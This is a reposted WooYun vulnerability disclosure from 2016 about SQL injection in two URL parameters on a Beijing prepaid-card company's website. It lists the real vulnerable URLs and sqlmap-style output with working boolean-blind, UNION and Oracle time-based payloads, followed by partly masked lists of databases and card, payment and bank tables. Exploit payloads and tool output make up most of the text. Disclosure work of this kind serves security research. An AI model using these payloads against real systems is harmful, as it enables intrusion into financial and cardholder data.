金融安全之资和信商通卡官网全网数据沦陷/多枚注入打包/设计大量卡号数据

admin
admin
admin
141432
文章
117
评论
2017年4月7日11:02:44评论362 views字数 230阅读0分46秒阅读模式
摘要

2016-03-28: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-12: 厂商已经主动忽略漏洞,细节向公众公开

漏洞概要 关注数(2) 关注此漏洞

缺陷编号: WooYun-2016-190022

漏洞标题: 金融安全之资和信商通卡官网全网数据沦陷/多枚注入打包/设计大量卡号数据

相关厂商: 北京资和信咨询中心

漏洞作者: 路人甲

提交时间: 2016-03-28 15:59

公开时间: 2016-05-12 15:59

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 未联系到厂商或者厂商积极忽略

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

0人收藏

漏洞详情

披露状态:

2016-03-28: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

金融安全之资和信商通卡官网全网数据沦陷/多枚注入打包/设计大量卡号数据

详细说明:

http://www.zihexin.net/brand/offersinfor.do?action=4&ID=540055

http://www.zihexin.net/client/unit.do?method=info&STORE_ID=4000105444100022" -D "ZHXDB_SETTLE

漏洞证明:

code 区域 
---
 Place: GET
 Parameter: ID
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: action=4&ID=540055' AND 1957=1957 AND 'AQSu'='AQSu
 
     Type: UNION query
     Title: Generic UNION query (NULL) - 2 columns
     Payload: action=4&ID=540055' UNION ALL SELECT CHR(113)||CHR(103)||CHR(102)||CHR(115)||CHR(113)||CHR(78)||CHR(117)||CHR(70)||CHR(102)||CHR(110)||CHR(98)||CHR(105)||CHR(108)||CHR(100)||CHR(106)||CHR(113)||CHR(111)||CHR(122)||CHR(122)||CHR(113),NULL FROM DUAL-- 
 ---
 web application technology: Nginx, JSP
 back-end DBMS: Oracle
 available databases [24]:
mask 区域
*****X_03*****
 *****QOSS*****
 *****ILL*****
 *****TXS*****
 *****BSN*****
 *****XFS*****
 *****WS_F*****
 *****GNI*****
 *****DSY*****
 *****LAP*****
 *****RDD*****
 *****RDS*****
 *****UTL*****
 *****WBS*****
 *****COT*****
 ***** S*****
 *****YSM*****
 *****YST*****
 *****MSY*****
 ***** X*****
 *****HXB*****
 *****HXB*****
 *****DB_S*****
 *****_SETT*****
 






 ---
 Place: GET
 Parameter: STORE_ID
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: method=info&STORE_ID=4000105444100022' AND 6214=6214 AND 'mamy'='mamy


     Type: UNION query
     Title: Generic UNION query (NULL) - 20 columns
     Payload: method=info&STORE_ID=-9947' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(108)||CHR(114)||CHR(120)||CHR(113)||CHR(113)||CHR(72)||CHR(111)||CHR(101)||CHR(82)||CHR(98)||CHR(71)||CHR(86)||CHR(77)||CHR(65)||CHR(113)||CHR(105)||CHR(97)||CHR(105)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- 


     Type: AND/OR time-based blind
     Title: Oracle AND time-based blind (heavy query)
     Payload: method=info&STORE_ID=4000105444100022' AND 2158=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'OrDw'='OrDw
 ---


 web application technology: Nginx, JSP
 back-end DBMS: Oracle
 Database: ZHXDB_SETTLE
 [278 tables]



mask 区域

*****--------*****
 *****MARKET_B*****
 *****110408  *****
 *****115312  *****
 *****TEMP    *****
 *****        *****
 *****        *****
 *****_CARD_LO*****
 *****LOG     *****
 *****        *****
 *****        *****
 *****RDTYPE  *****
 *****RDTYPEMA*****
 *****NDPAYLOG*****
 *****RKETFILE*****
 *****RKETFILE*****
 *****SFILE   *****
 *****GNCOMPAN*****
 *****LIDCARD *****
 *****STEBOOK *****
 *****ARD     *****
 *****ERCHANT *****
 *****ERCHANTT*****
 *****LAN     *****
 *****OLE     *****
 *****OLEDETAI*****
 *****NCELTABL*****
 *****YPE     *****
 *****YPEMARKE*****
 *****ACCUMWAS*****
 *****TFILE   *****
 *****LE      *****
 *****ELOG    *****
 *****CARD    *****
 *****BOOK    *****
 *****EBOOK   *****
 *****BOOK    *****
 *****IL      *****
 *****IL_CP   *****
 *****IL_SAMSU*****
 *****CPL     *****
 *****VIP     *****
 *****VIP_HIS *****
 *****_SETTLE_*****
 *****YPE     *****
 *****YPE4MERC*****
 *****ECARDCAT*****
 *****ECARDTYP*****
 *****ECARDTYP*****
 *****        *****
 *****MESG    *****
 *****SAL     *****
 *****        *****
 *****_HIS    *****
 *****_HIS_TEM*****
 *****_TEMP   *****
 *****        *****
 *****RCH     *****
 *****PE_AREA *****
 *****4       *****
 *****4       *****
 *****5       *****
 *****PAYMENTI*****
 *****ITRATION*****
 *****CHDETAIL*****
 *****DBAL    *****
 *****RGEBACK *****
 *****RGEBACK_*****
 *****RGE_DETA*****
 *****RGE_THAW*****
 *****LECT    *****
 *****LECT_DET*****
 *****LECT_MAI*****
 *****NTRY    *****
 *****RENCY   *****
 *****T_CARD  *****
 *****AEXPR   *****
 *****HANGE_RA*****
 *****ERETURNS*****
 *****_RAL    *****
 *****AM      *****
 *****DATA    *****
 *****INFO    *****
 *****URNAMT  *****
 *****TLE_FEE *****
 *****TISTIC  *****
 *****CB_CLEAR*****
 *****CHARGEBA*****
 *****WINFO   *****
 *****NS      *****
 *****NS_1110 *****
 *****NS_1240 *****
 *****NS_1644 *****
 *****NS_CANCE*****
 *****NS_FEE  *****
 *****NS_MAIN *****
 *****NS_TJ   *****
 *****REEZE_LO*****
 *****PT_MERCH*****
 *****NFO     *****
 *****_USERS  *****
 *****        *****
 *****        *****
 *****TE      *****
 *****TBALANCE*****
 *****CCOUNT  *****
 *****CTUALDET*****
 *****USTOMERM*****
 *****NFO     *****
 *****ARAM    *****
 *****        *****
 *****        *****
 *****        *****
 *****        *****
 *****O       *****
 *****STRACT  *****
 *****        *****
 *****        *****
 *****        *****
 *****E       *****
 *****        *****
 *****        *****
 *****        *****
 *****CH_INFO *****
 *****NT      *****
 *****        *****
 *****ANGE    *****
 *****ANGE_BAK*****
 *****FO      *****
 *****RM      *****
 *****T       *****
 *****_INFO   *****
 *****_MERCH  *****
 *****        *****
 *****LLECT   *****
 *****FO      *****
 *****NAGE    *****
 *****NAGE2   *****
 *****        *****
 *****        *****
 *****_PRODUCT*****
 *****UCT     *****
 *****_INFO   *****
 *****LE_INFO *****
 *****UND     *****
 *****        *****
 *****_2016   *****
 *****_TMP    *****
 *****UNT     *****
 *****VATE    *****
 *****ID      *****
 *****C_INFO  *****
 *****GE      *****
 *****        *****
 *****ENT     *****
 *****ENT_HIS *****
 *****ENT_LOG *****
 *****URE     *****
 *****AYMENT  *****
 *****AYMENT_S*****
 *****T       *****
 *****_REQ    *****
 *****        *****
 *****        *****
 *****TUALDETA*****
 *****E       *****
 *****FO      *****
 *****CEIVECOL*****
 *****CEIVE_ST*****
 *****CHDETAIL*****
 *****CHDETAIL*****
 *****CHDETAIL*****
 *****CHDETAIL*****
 *****BCM_SOA *****
 *****CMB_SOA *****
 *****ICBC_HIS*****
 *****ICBC_TDA*****
 *****SPDB_SOA*****
 *****NS_BANK *****
 *****NS_MAIN *****
 *****        *****
 *****SSAGE   *****
 *****K       *****
 *****K_BAK   *****
 *****        *****
 *****PE_41   *****
 *****        *****
 *****08      *****
 *****_TEST   *****
 *****_TMP    *****
 *****        *****
 *****        *****
 *****        *****
 *****        *****
 *****        *****
 *****E       *****
 *****        *****
 *****MER     *****
 *****        *****
 *****E       *****
 *****        *****
 *****T_BATCH *****
 *****T_DAY   *****
 *****T_NORATE*****
 *****SAGE    *****
 *****LIST    *****
 *****LIST_TMP*****
 *****LIST_TMP*****
 *****LIST_TMP*****
 *****LIST_TMP*****
 *****E       *****
 *****Y       *****
 *****Y_TMP   *****
 *****Y_VIEW  *****
 *****Y_VIEW_P*****
 *****Y_VIEW_T*****
 *****O       *****
 *****        *****
 *****FLAG    *****
 *****FLAG_HRS*****
 *****INFO    *****
 *****E       *****
 *****        *****
 *****        *****
 *****Y       *****
 *****FO      *****
 *****BAI     *****
 *****        *****
 *****_DATE   *****
 *****INFO    *****
 *****_INFO   *****
 *****        *****
 *****        *****
 *****        *****
 *****        *****
 *****        *****
 *****DADING  *****
 *****        *****
 *****        *****
 *****        *****
 *****        *****
 *****STORE   *****
 *****        *****
 *****        *****
 *****        *****
 *****        *****
 *****ER      *****
 *****ITY     *****
 *****        *****
 *****        *****
 *****IVITY   *****
 *****RD      *****
 *****NER     *****
 *****COUNT   *****
 *****O       *****
 *****ICE     *****
 *****RE      *****
 *****RE_20140*****
 *****        *****
 *****        *****
 *****        *****
 *****E       *****
 *****        *****
 *****        *****
 *****E       *****
 *****        *****
 *****        *****
 *****ORE     *****
 *****        *****
 *****        *****
 *****        *****
 *****        *****
 *****        *****
 *****40928   *****
 *****EL      *****
 *****        *****
 *****        *****
 *****        *****
 *****        *****
 *****--------*****
 *****-*****
 *****echnology*****
 *****MS: Or*****
 *****e: Z*****
 *****----+---*****
 *****    | En*****
 *****----+---*****
 *****    | 15*****
 *****D   | 15*****
 *****LOG | 38*****
 *****    | 2 *****
 *****    | 1 *****
 *****    | 1 *****
 *****------+*****

修复方案:

参数过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 此漏洞我司已于三月份发现并修复。

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin